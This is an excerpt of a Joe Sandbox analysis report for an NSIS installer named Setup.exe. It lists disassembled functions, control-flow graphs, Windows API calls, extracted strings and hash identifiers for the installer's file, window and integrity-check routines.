                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                                                                                • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                                                                                                                                                                                                                Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                                                                                                                                                • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                                                                                                                                                  • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                                                                                                                                                • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                • API String ID: 608394941-1650083594
                                                                                                                                                                                                                                                                • Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                                                                                                • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                                                                                                                                                                                                                Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,AllocatedPerceivedCombinesDutch,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,AllocatedPerceivedCombinesDutch,AllocatedPerceivedCombinesDutch,00000000,00000000,AllocatedPerceivedCombinesDutch,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                • String ID: AllocatedPerceivedCombinesDutch$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                                                                                                                • API String ID: 4286501637-2664000205
                                                                                                                                                                                                                                                                • Opcode ID: 45ef1293b1ae6c8eded58fe2a9d20f8c0b73c793bdda268a0525958b422070da
                                                                                                                                                                                                                                                                • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45ef1293b1ae6c8eded58fe2a9d20f8c0b73c793bdda268a0525958b422070da
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                                                                                                                                                                                                                Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 653 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 656 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 653->656 657 4035d7-4035dc 653->657 665 403615 656->665 666 4036fc-40370a call 4032d2 656->666 658 4037b6-4037ba 657->658 668 40361a-403631 665->668 672 403710-403713 666->672 673 4037c5-4037ca 666->673 670 403633 668->670 671 403635-403637 call 403336 668->671 670->671 677 40363c-40363e 671->677 675 403715-40372d call 403368 call 403336 672->675 676 40373f-403769 GlobalAlloc call 403368 call 40337f 672->676 673->658 675->673 703 403733-403739 675->703 676->673 701 40376b-40377c 676->701 679 403644-40364b 677->679 680 4037bd-4037c4 call 4032d2 677->680 685 4036c7-4036cb 679->685 686 40364d-403661 call 405e0c 679->686 680->673 689 4036d5-4036db 685->689 690 4036cd-4036d4 call 4032d2 685->690 686->689 700 403663-40366a 686->700 697 4036ea-4036f4 689->697 698 4036dd-4036e7 call 407281 689->698 690->689 697->668 702 4036fa 697->702 698->697 700->689 706 40366c-403673 700->706 707 403784-403787 701->707 708 40377e 701->708 702->666 703->673 703->676 706->689 709 403675-40367c 706->709 710 40378a-403792 707->710 708->707 709->689 711 40367e-403685 709->711 710->710 712 403794-4037af SetFilePointer call 405e0c 710->712 711->689 713 403687-4036a7 711->713 716 4037b4 712->716 713->673 715 4036ad-4036b1 713->715 717 4036b3-4036b7 715->717 718 4036b9-4036c1 715->718 716->658 717->702 717->718 718->689 719 4036c3-4036c5 718->719 719->689
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                                                                                                                                                • Null, xrefs: 0040367E
                                                                                                                                                                                                                                                                • soft, xrefs: 00403675
                                                                                                                                                                                                                                                                • Inst, xrefs: 0040366C
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 004035D7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                • Opcode ID: ad9dd0192889ad844885e917e82d5b734c8172191f67072e787dfaf2e8a54f21
                                                                                                                                                                                                                                                                • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad9dd0192889ad844885e917e82d5b734c8172191f67072e787dfaf2e8a54f21
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                                                                                                                                                                                                                Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 720 40337f-403396 721 403398 720->721 722 40339f-4033a7 720->722 721->722 723 4033a9 722->723 724 4033ae-4033b3 722->724 723->724 725 4033c3-4033d0 call 403336 724->725 726 4033b5-4033be call 403368 724->726 730 4033d2 725->730 731 4033da-4033e1 725->731 726->725 732 4033d4-4033d5 730->732 733 4033e7-403407 GetTickCount call 4072f2 731->733 734 403518-40351a 731->734 735 403539-40353d 732->735 746 403536 733->746 748 40340d-403415 733->748 736 40351c-40351f 734->736 737 40357f-403583 734->737 739 403521 736->739 740 403524-40352d call 403336 736->740 741 403540-403546 737->741 742 403585 737->742 739->740 740->730 755 403533 740->755 744 403548 741->744 745 40354b-403559 call 403336 741->745 742->746 744->745 745->730 757 40355f-403572 WriteFile 745->757 746->735 751 403417 748->751 752 40341a-403428 call 403336 748->752 751->752 752->730 758 40342a-403433 752->758 755->746 759 403511-403513 757->759 760 403574-403577 757->760 761 403439-403456 call 407312 758->761 759->732 760->759 762 403579-40357c 760->762 765 40350a-40350c 761->765 766 40345c-403473 GetTickCount 761->766 762->737 765->732 767 403475-40347d 766->767 768 4034be-4034c2 766->768 769 403485-4034b6 MulDiv wsprintfW call 404f72 767->769 770 40347f-403483 767->770 771 4034c4-4034c7 768->771 772 4034ff-403502 768->772 778 4034bb 769->778 770->768 770->769 775 4034e7-4034ed 771->775 776 4034c9-4034db WriteFile 771->776 772->748 773 403508 772->773 773->746 777 4034f3-4034f7 775->777 776->759 779 4034dd-4034e0 776->779 777->761 781 4034fd 777->781 778->768 779->759 780 4034e2-4034e5 779->780 780->777 781->746
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403464
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004034A4
                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                                                                                                                                                                                • API String ID: 651206458-1535804072
                                                                                                                                                                                                                                                                • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                                                                                                • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                                                                                                                                                                                                                Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 782 404f72-404f85 783 405042-405044 782->783 784 404f8b-404f9e 782->784 785 404fa0-404fa4 call 406805 784->785 786 404fa9-404fb5 lstrlenW 784->786 785->786 788 404fd2-404fd6 786->788 789 404fb7-404fc7 lstrlenW 786->789 792 404fe5-404fe9 788->792 793 404fd8-404fdf SetWindowTextW 788->793 790 405040-405041 789->790 791 404fc9-404fcd lstrcatW 789->791 790->783 791->788 794 404feb-40502d SendMessageW * 3 792->794 795 40502f-405031 792->795 793->792 794->795 795->790 796 405033-405038 795->796 796->790
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                • Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                                                                                                • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                                                                                                                                                                                                Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 797 401eb9-401ec4 798 401f24-401f26 797->798 799 401ec6-401ec9 797->799 800 401f53-401f69 GlobalAlloc call 406805 798->800 801 401f28-401f2a 798->801 802 401ed5-401ee3 call 4062a3 799->802 803 401ecb-401ecf 799->803 811 401f6e-401f7b 800->811 805 401f3c-401f4e call 406009 801->805 806 401f2c-401f36 call 4062a3 801->806 814 401ee4-402702 call 406805 802->814 803->799 807 401ed1-401ed3 803->807 817 402387-40238d GlobalFree 805->817 806->805 807->802 813 401ef7-402e50 call 406009 * 3 807->813 816 4030e3-4030f2 811->816 811->817 813->816 829 402708-40270e 814->829 817->816 829->816
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
